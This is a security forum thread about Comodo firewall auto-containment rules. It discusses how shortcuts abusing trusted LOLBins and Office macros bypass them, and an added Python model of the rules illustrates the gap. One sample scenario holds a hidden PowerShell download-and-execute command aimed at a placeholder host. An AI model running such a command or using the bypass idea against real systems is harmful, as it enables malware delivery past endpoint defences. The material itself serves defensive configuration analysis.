Video Reviews - Security and Privacy
Comodo's killer.
<blockquote data-quote="Andy Ful" data-source="post: 1114709" data-attributes="member: 32260"><p>It is unimportant because the ISO file is not an executable/application. In my tests I used Edge.</p><p>These rules should work in the same way as:</p><p>Action - Run Virtually, File Group - All Applications, File Origin - Removable Media</p><p>Action - Run Virtually, File Group - All Applications, File Origin - Internet</p><p>Action - Run Virtually, File Group - All Applications, File Rating - Unrecognized (default policy)</p><p>Simply, all applications executed from Removable Media and the Internet are contained. Unrecognized applications are contained everywhere. The Proactive setup also includes three Block rules for Malicious Applications, Suspicious Locations, and Containment Folders.</p><p>These settings will <s>contain most of my POCs and</s> prevent most malware, including 0-day ones. It is a very strong setup.</p><p>It is possible to bypass such a setup by using shortcuts + abusing the Trusted applications already installed in the system (LOLBins, MS Office, etc.). For example, Comodo's challenge method used in my video is not blocked (shortcut + LOLBin abused), and none of my POCs are blocked when running Office macros.</p><p>I would also enable Embedded Code Detection for cmd[.]exe (to prevent many attacks via shortcuts) and block macros in Office applications.</p><p>Post edited.</p></blockquote>
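The rule set and the bypass class in the post above can be modelled to see exactly which events the containment rules catch and which fall through. The following is an added example written for this thread; it is not Comodo's engine, Comodo's configuration format, or Andy Ful's POC. It assumes that rules are evaluated top-down with the first match deciding the action, and that Embedded Code Detection for cmd.exe makes the engine rate the embedded command line as an object with no reputation (Unrecognized), so the default Unrecognized rule contains it. The paths, ratings, command lines and the `decide`/`effective_event` helpers are all made up for illustration; the two Block rules for Suspicious Locations and Containment Folders are left out because their path lists are not given in the post.

```python
"""
Constructed model of a Comodo-style auto-containment policy (example code for
this thread, not Comodo's engine).  Assumptions: rules match top-down, first
match wins; Embedded Code Detection turns a cmd.exe command line carrying
embedded code into an Unrecognized object.  All sample data is invented.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple
import re


@dataclass(frozen=True)
class Exec:
    """One execution event as the containment engine would see it."""
    path: str            # image that is about to run
    rating: str          # "Trusted", "Unrecognized" or "Malicious"
    origin: str          # "Internet", "RemovableMedia" or "Local"
    cmdline: str = ""    # full command line handed to the image


@dataclass(frozen=True)
class Rule:
    action: str                    # "Block" or "RunVirtually"
    origin: Optional[str] = None   # File Origin condition, None = any
    rating: Optional[str] = None   # File Rating condition, None = any
    # File Group is "All Applications" for every rule in the post, so the
    # group condition is implicit in this model.

    def matches(self, e: Exec) -> bool:
        return ((self.origin is None or e.origin == self.origin) and
                (self.rating is None or e.rating == self.rating))


# The rule set as described in the post, in evaluation order.
PROACTIVE_RULES: List[Rule] = [
    Rule("Block", rating="Malicious"),
    Rule("RunVirtually", origin="RemovableMedia"),
    Rule("RunVirtually", origin="Internet"),
    Rule("RunVirtually", rating="Unrecognized"),   # default policy
]

# Rough stand-in for the engine's embedded-code check: cmd.exe invoked with
# /c or /k followed by a payload.  Real detection is richer; this is a heuristic.
_CMD_EMBEDDED = re.compile(r"(?i)\s/[ck]\s+\S")


def effective_event(e: Exec, embedded_code_images: Tuple[str, ...]) -> Exec:
    """Model Embedded Code Detection: if it is enabled for this image and the
    command line carries embedded code, the object being rated is that code,
    which has no reputation, i.e. it is treated as Unrecognized (assumption)."""
    image = e.path.rsplit("\\", 1)[-1].lower()
    if image in embedded_code_images and _CMD_EMBEDDED.search(e.cmdline):
        return Exec(e.path, "Unrecognized", e.origin, e.cmdline)
    return e


def decide(e: Exec, rules: List[Rule] = PROACTIVE_RULES,
           embedded_code_images: Tuple[str, ...] = ()) -> str:
    """Return the containment action for an event; 'Allow' if no rule matches."""
    e = effective_event(e, embedded_code_images)
    for r in rules:
        if r.matches(e):
            return r.action
    return "Allow"


# Constructed scenarios (invented paths and ratings).
DOWNLOADED_SIGNED = Exec(r"C:\Users\u\Downloads\installer.exe", "Trusted", "Internet")
USB_TOOL = Exec(r"E:\tool.exe", "Unrecognized", "RemovableMedia")
DROPPED_UNKNOWN = Exec(r"C:\ProgramData\x\svc.exe", "Unrecognized", "Local")
KNOWN_BAD = Exec(r"C:\Users\u\Downloads\crypt.exe", "Malicious", "Internet")
# The bypass class from the post: a shortcut launches an already-trusted LOLBin
# on the local disk, so neither the origin rules nor the rating rule fire.
SHORTCUT_LOLBIN = Exec(r"C:\Windows\System32\cmd.exe", "Trusted", "Local",
                       cmdline=r'cmd.exe /c powershell -nop -w hidden -c "iwr http://example.invalid/p.ps1 | iex"')
# Same class via Office: the trusted host runs, the macro is never a "file" to rate.
OFFICE_MACRO = Exec(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                    "Trusted", "Local", cmdline=r'WINWORD.EXE C:\Users\u\Downloads\invoice.docm')


def demo() -> dict:
    """Decide every scenario, once with and once without Embedded Code Detection on cmd.exe."""
    return {
        "downloaded_signed": decide(DOWNLOADED_SIGNED),
        "usb_tool": decide(USB_TOOL),
        "dropped_unknown": decide(DROPPED_UNKNOWN),
        "known_bad": decide(KNOWN_BAD),
        "shortcut_lolbin": decide(SHORTCUT_LOLBIN),
        "shortcut_lolbin_ecd": decide(SHORTCUT_LOLBIN, embedded_code_images=("cmd.exe",)),
        "office_macro": decide(OFFICE_MACRO),
    }


if __name__ == "__main__":
    for name, action in demo().items():
        print(f"{name:22s} -> {action}")
```

The two scenarios that come back `Allow` are the ones the post calls out: the executed image is Trusted and Local, so the origin and rating conditions never match, and containment is decided on the host binary rather than on what it is told to run. Turning on the modelled Embedded Code Detection for cmd.exe moves the shortcut case to `RunVirtually`; the Office case is not touched by any containment rule in this set, which is why blocking macros has to be done in the Office applications themselves.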